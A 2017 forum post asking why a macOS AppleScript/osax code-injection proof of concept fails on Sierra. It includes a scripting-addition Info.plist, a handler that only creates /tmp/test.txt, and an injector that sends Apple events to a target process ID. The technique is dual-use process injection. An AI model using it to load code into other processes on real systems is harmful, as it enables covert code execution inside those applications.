Page 1 of 1

applescript injection POC

PostPosted: Mon Nov 06, 2017 4:24 pm
by adam81
I am trying to make a POC of code injection using applescript injection technic which is used in GitHub project EasySIMBL.

The method also described here. (It's basically a huge article, just search for AppleScript at bundle injection, and you’ll get there)

The steps I've done :

I made a bundle suffix osax file that creates a file at /tmp/test.txt. The bundle contains the following items:
1.1 Info.plist:

Code: Select all
<?xml version=“1.0” encoding=“UTF-8"?>
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd“>
<plist version=“1.0”>
<dict>
    <key>CFBundleDevelopmentRegion</key>
    <string>English</string>
    <key>CFBundleExecutable</key>
    <string>OsaxLoaded</string>
    <key>CFBundleIdentifier</key>
    <string>com.yourcompany.OsaxLoaded</string>
    <key>CFBundleInfoDictionaryVersion</key>
    <string>6.0</string>
    <key>CFBundleName</key>
    <string>OsaxLoaded</string>
    <key>CFBundlePackageType</key>
    <string>osax</string>
    <key>CFBundleShortVersionString</key>
    <string>1.0</string>
    <key>CFBundleSignature</key>
    <string>ascr</string>
    <key>CFBundleVersion</key>
    <string>1</string>
    <key>OSAScriptingDefinition</key>
    <string>app.sdef</string>
    <key>OSAXHandlers</key>
    <dict>
        <key>Events</key>
        <dict>
            <key>OPNeopen</key>
            <dict>
                <key>Context</key>
                <string>Process</string>
                <key>Handler</key>
                <string>InjectEventHandler</string>
                <key>ThreadSafe</key>
                <true/>
            </dict>
        </dict>
    </dict>
</dict>
</plist>



1.2 The code to be injected (osax bundle):

Code: Select all
//  main.m
//  OsaxLoaded
//
//

#import <Foundation/Foundation.h>

__attribute__((visibility(“default”)))
OSErr InjectEventHandler(const AppleEvent *ev, AppleEvent *reply, long refcon)
{
    OSErr resultCode = noErr;
    [[NSFileManager defaultManager] createFileAtPath:@“/tmp/test.txt” contents:nil attributes:nil];
    return resultCode;
}



Here's the structure of my osax bundle :

Code: Select all
sh-3.2# ls /Library/ScriptingAdditions/OsaxLoaded.osax/Contents/
Info.plist    MacOS        _CodeSignature


Now I put the osax bundle at /Library/ScriptingAdditions/

Then I wrote a templated Cocoa App (injection target) that does nothing (didn't add any additional code)

In addition I wrote a Mach-o that should make the app I wrote previously to load the script addition (osax bundle). After that it sends the event that corresponds to the event in info.plist and should execute the handler I wrote in the osax bundle Mach-o.

The injector code:

Code: Select all
//  main.m
//  OsaxInjector
//
//

#import <Foundation/Foundation.h>
#import <Carbon/Carbon.h>
#import <ScriptingBridge/ScriptingBridge.h>

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        if (argc != 2)
        {
            printf(“USAGE: injector pid\n”);
            return 1;
        }
        TEST *test = [[TEST alloc] init];
        pid_t pid = atoi(argv[1]);
        SBApplication* sbApp = [SBApplication applicationWithProcessIdentifier:pid];
        [sbApp setSendMode:kAENoReply | kAENeverInteract | kAEDontRecord];
        [sbApp sendEvent:kASAppleScriptSuite id:kGetAEUT parameters:0];

        // Inject!
        [sbApp setSendMode:kAENoReply | kAENeverInteract | kAEDontRecord];
        id injectReply = [sbApp sendEvent:‘OPNe’ id:‘open’ parameters:0];
        if (injectReply != nil) {
            NSLog(@“unexpected injectReply: %@“, injectReply);
        }
        [[NSProcessInfo processInfo]disableSuddenTermination];
    }
    return 0;
}

When tested using the pid provided by lsappinfo info “ToInjectApp”, it seems like the code wasn't injected and /tmp/test.txt wasn't created.

any idea what I am doing wrong?

OS Version: Sierra